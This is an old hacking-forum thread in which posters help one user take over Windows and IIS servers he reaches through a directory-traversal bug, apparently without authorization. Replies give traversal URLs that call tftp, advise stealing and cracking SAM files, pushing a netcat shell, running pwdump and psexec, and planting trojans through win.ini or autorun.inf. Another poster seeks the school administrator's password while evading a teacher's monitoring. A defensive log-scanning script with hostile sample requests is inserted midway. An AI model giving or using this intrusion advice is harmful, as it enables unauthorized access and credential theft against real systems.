extreme
Sep 5 2003, 01:38 AM
Let's say that I have access to a machine, so I can get any file I want as long as I know where it is located.. Example: 127.0.0.1/../../../../../winnt/win.ini. Of course, this file has no use to me whatsoever to get a shell, or admin passes or anything relevant... So can you suggest what file I would have to get to gain any of that? Thanks..
ArEs
Sep 5 2003, 02:16 AM
Well, I'd get the SAM file from system32/config/ and try to read out the passes with L0pht..... Google for SAM cracking or something and you'll find enough about that (I think SAM files exist only on NT/XP/2000).
dissolutions
Sep 5 2003, 04:23 AM
moved to the windows forum... Please post to the correct forum next time.
JFCa
Sep 5 2003, 10:07 AM
You can't get the SAM when the machine is running... Perhaps you can try to get the /winnt/repair/SAM file and pass it to LC4... If you are a lucky man you will get the administrator password from when the system was installed.
JFCa
Sep 10 2003, 04:11 PM
.... or the repair disk was made.
thewthrman
Sep 10 2003, 07:37 PM
If you can place rdisk.exe with a switch that I can't remember (maybe -y?) in the startup directory, it will update the repair copy of sam._ the next time it reboots. I used to copy cmd.exe to the scripts directory on IIS boxes and run rdisk from a browser.
extreme
Sep 10 2003, 09:48 PM
Well, the bug looks like this: http://123.123.123.123/../../../../../winnt/win.ini and that way I can read any file or dir. I got the SAM repair file but LC4 couldn't do shit about cracking it... Maybe there is a way to fire a command-line tftp or something?
w00dy
Sep 10 2003, 10:01 PM
| CODE | | http://123.123.123.123/../../../../../winnt/system32/tftp%20source%20put%20-i%20dest |
or whatever the tftp syntax is... but you get the gist of it, I'm sure.
tgif
Sep 10 2003, 10:52 PM
Don't forget that SAM files are only on the OS Windows 2000. That's all I know of, but since Windows 2k was based off of NT and both have NTFS partitions, NT may also use SAM files.
krackatoa
Sep 12 2003, 02:43 AM
There's a lot of information missing..
Is this a domain controller, member server in a domain, stand alone server, or workstation?
Can you access only through port 80 using directory traversal? What account are you logged-in with?
There's many ways to go about getting what you need but some depend on what is open and what is not.
Are you limited in outbound connections?
If you can execute using directory traversal and have the appropriate rights, you should easily be able to tftp and run pwdump to pull all the accounts in Active Directory if it's a Windows 2000 DC system using AD.
If you aren't restricted on outbound ports, upload netcat and push a shell to yourself. If it's a Win2k system, install Terminal Services remotely, install LC on it, and pull accounts from the registry.
Use psexec if NetBIOS is open. Create your own account if you don't have one.
There are many ways to do it; it all depends on what is open to access.
extreme
Sep 12 2003, 02:58 AM
Wow, this is a nice post.. You have answered me even the things I was about to ask in the future.. But seriously now. I can access only through IE on port 80... So I don't know if TFTP will work, because if I type in /../../winnt/tftp.exe I will get a download alert I suppose.. OK, the important thing is that I can only enter via port 80 in IE... And here is another question.. About a different server.. I have access only to a TFTP server.. So I can download and upload anything, but cannot execute it... So I thought of downloading his win.ini and adding some startup method for my trojan, and then uploading both the updated win.ini and the trojan and waiting for him to restart... BTW, is there a way I can make the server reboot remotely... It is Win2k/NT usually..
[Sunny]
Sep 12 2003, 06:44 AM
Is it an Apache server or IIS or something else? Because with Apache or with IIS directory traversal you can get your files on the server with tftp (both) or an ftp echo script (IIS only). And you can execute your file directly and it's not so complicated. As many people in this post said, give us more information please.
extreme
Sep 12 2003, 05:10 PM
OK, both computers are Win2000... The first one is an IIS server and the second one is a personal computer on DSL (some custom webserver installed)... 1st: There are no open relevant ports, so there is no other way than this only bug it has that lets me do directory traversal. I can't remember what software it has that is vulnerable, but it lets me browse his files when I enter this: http://123.123.123.123:8888/surf/.../.../...../.../.../winnt So the only thing I can do is read any file, I guess.. maybe open up a shell if it has anything to do with the IIS unicode bugs, but I don't know, so I will let you tell me.. 2nd: This one has the TFTP service enabled, so I can only upload or download any file, but have no way to execute it, again... It has a serv-u server started too, but no anonymous logins accepted.. He has a webserver installed, but I don't know which one... When I scan him, it says that the webserver type is MyHTTP server, so who knows what software he uses.... So he has a webpage running on port 80 too..
GSecur
Sep 12 2003, 05:17 PM
LC4 probably couldn't do anything with the SAM repair file because it has syskey enabled. Search the board for a SYSKEY tool.
extreme
Sep 12 2003, 07:58 PM
Yeah, it didn't do anything with the repair file... I found one SYSKEY software, but it is shareware.. Any other, better? One more thing, is there any way to get the SAM file from config?
krackatoa
Sep 13 2003, 02:09 AM
Can you execute in any web directory like inetpub scripts? If you can find an executable directory, upload a file to it and call it via IE. Can you change his web files?
What account are you running under? Try changing directories into the administrator's profile. If you can traverse into that, then you can place something in his startup.
extreme
Sep 13 2003, 02:37 AM
Like I said, I can only READ, and if I try to READ an EXE file, I will get a download prompt.. I can also read http://HISIP:8888/surf/.../.../.../.../......ub/AdminScripts There are some vbs files listed then...
krackatoa
Sep 13 2003, 05:02 AM
With no execute, that sucks.
You made some mention about being able to upload via tftp. Is there any active content in his web pages?
Maybe it's possible to overwrite his web files with an edited set from you?
extreme
Sep 13 2003, 10:36 PM
TFTP is for the other vulnerable server.... Yes, I could probably overwrite his web files, if I knew the exact path to index.html.. Which I don't.. I decided to try two things: 1. update his win.ini or system.ini with my trojan startup information, and then upload both the updated win.ini and the trojan server... 2. upload my trojan server and autorun.inf into the root of c:\ and wait for him to come browsing his hard drive...
Action
Sep 27 2003, 09:28 AM
I have a problem. This is an Apache 2.0.39 vulnerability and I have a problem. Here is my directory traversal: http://ip/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e...t+c:\j.txt What is wrong with this, cause it doesn't work? I get the result: Error message: Premature end of script headers: C:/WINNT/system32/tftp.exe
coz
Sep 27 2003, 12:40 PM
You wanna hack a JANA webserver, hm? Guess what... all the little IIS tricks won't work :\
Action
Sep 27 2003, 07:56 PM
No, it's Apache 2.0.39.
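Every request shape quoted in this thread (the plain /../../winnt/win.ini read, the %5c%2e%2e%5c form Action sent at Apache 2.0.39, the .../.../ variant extreme saw on the custom server, and the overlong-UTF-8 %c0%af slash behind the "IIS unicode bugs" he mentions) lands in the web server's access log, which is where the defender sees it. The following is an added example, not code from any poster in this thread: a small Python scanner that canonicalises a request path the way a lenient Windows server ends up treating it (repeated percent-decoding to catch %25 double encoding, the two overlong slashes IIS 4/5 accepted, backslash folding) and then flags traversal segments and the Windows paths discussed above. The log lines are constructed in a simplified IIS W3C layout; the client addresses and paths are illustrative, not real traffic.

```python
"""Flag directory-traversal requests in a web-server access log.

Added example for this thread, not code from any poster. The log lines below
are constructed in a simplified IIS W3C layout:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
Client addresses and request paths are illustrative.
"""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Overlong UTF-8 encodings of '/' and '\' that IIS 4/5 accepted (the "IIS unicode
# bug" the thread mentions). A conforming decoder rejects them (unquote() would turn
# them into U+FFFD), so they are folded to '/' before each decoding round.
OVERLONG_SLASH = re.compile(r'%c0%af|%c1%9c', re.I)

# A path segment of two or more dots: "/../" and the "/.../" form seen on the custom server.
DOTDOT = re.compile(r'(?:^|/)\.{2,}(?:/|$)')

# Windows files the thread talks about reading or executing through traversal.
SENSITIVE = re.compile(
    r'/(?:winnt|windows)/(?:win\.ini|repair/sam|system32/config/sam|'
    r'system32/(?:cmd|tftp)\.exe)', re.I)


def normalize_uri(uri: str, max_rounds: int = 3) -> str:
    """Canonicalise a request path: decode repeatedly (catches %25 double
    encoding), accept the overlong slashes, fold backslashes to '/',
    collapse duplicate slashes."""
    s = uri
    for _ in range(max_rounds):
        s = OVERLONG_SLASH.sub('/', s)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace('\\', '/')
    return re.sub(r'/+', '/', s)


@dataclass
class Finding:
    client: str
    raw_uri: str
    normalized: str
    reasons: List[str]


def classify(stem: str) -> List[str]:
    """Return the reasons a request stem looks like traversal, or [] if clean."""
    norm = normalize_uri(stem)
    reasons = []
    if DOTDOT.search(norm):
        reasons.append('traversal')
    if SENSITIVE.search(norm):
        reasons.append('sensitive-path')
    # '..' only appears after decoding: the client was hiding it from naive filters
    if 'traversal' in reasons and '..' not in stem:
        reasons.append('encoded')
    return reasons


def scan_log(text: str) -> List[Finding]:
    """Parse the seven-field log layout above and return one Finding per suspicious line."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if line.startswith('#') or len(parts) != 7:
            continue
        client, stem = parts[2], parts[4]
        reasons = classify(stem)
        if reasons:
            findings.append(Finding(client, stem, normalize_uri(stem), reasons))
    return findings


# Constructed sample log (not real traffic), mirroring the request shapes in the thread.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-09-10 22:01:12 10.0.0.5 GET /../../../../../winnt/win.ini - 200
2003-09-10 22:03:40 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2003-09-10 22:05:02 10.0.0.5 GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5cwinnt/system32/tftp.exe -i+10.0.0.5+get+nc.exe 500
2003-09-10 22:06:11 10.0.0.7 GET /surf/.../.../.../winnt/repair/sam - 200
2003-09-10 22:07:30 10.0.0.9 GET /index.html - 200
2003-09-10 22:08:00 10.0.0.9 GET /images/logo.gif - 200
2003-09-10 22:09:00 10.0.0.5 GET /scripts/%252e%252e%255c%252e%252e%255cwinnt/win.ini - 404
"""

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f'{f.client}  {", ".join(f.reasons):32} {f.raw_uri} -> {f.normalized}')
```

The point of decoding in rounds rather than once is that a 404 or 500 in the log does not mean the attempt was harmless: the double-encoded and backslash forms are exactly the ones a single-pass filter in front of the server lets through, so they are worth an alert even when the request itself failed.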
marcus90509
Oct 6 2003, 09:05 PM
At my school I have an Italian XP Pro with 3 accounts:
Alunno (student is the translation) - limited
Docente (teacher is the translation) - less limited, like a power user but less
Administrator (no need of translation) - admin
Alunno and Docente have blank passwords. Admin has a password, syskeyed. I must recover the password for admin because I accessed admin before and I have documents in admin's EFS folder.
I must do it in Windows because my teacher monitors me, and in a fast way (I don't need to crack the passwords there; I need to de-syskey and save the passwords to a floppy. I will crack it at home).
Is there a system? (I have LC4 but I can't install it at school because I have limited privileges.)
I need it.
agamemnon
Oct 6 2003, 10:36 PM
We are all assuming that he's not using good ol' Win98/95, whereupon you could just grab the *.pwl files. Anyhow, I posted a while back about exploiting MS ISA Server and SurfControl's SuperScout and what interesting files you could grab through directory traversal. Passwords for the web-proxy program WILL be stored on that box. You WILL be able to find them. The only issue is how they are encrypted, and whether or not they are in use. Marcus, resend that as a separate posting. Then more people'll help!
| QUOTE (thewthrman @ Sep 10 2003, 02:37 PM) | | If you can place rdisk.exe with a switch that I can't remember (maybe -y?) in the startup directory, it will update the repair copy of sam._ the next time it reboots. Used to copy cmd.exe to the scripts directory on IIS boxes and run rdisk from a browser. |
| CODE | | _http://support.microsoft.com/support/kb/articles/q122/8/57.asp |
/S & /S-
Is it possible to mod the autoexec.bat to make a copy of the SAM file at startup? copy c:\**\*.sam c:\backup.sam I've never tried this but I think it's worth a try ...
Terminal
Sep 5 2004, 11:29 AM
Most probably it won't work, but someone should try it. Also keep a winstart.bat in the winnt (or windows) folder and try.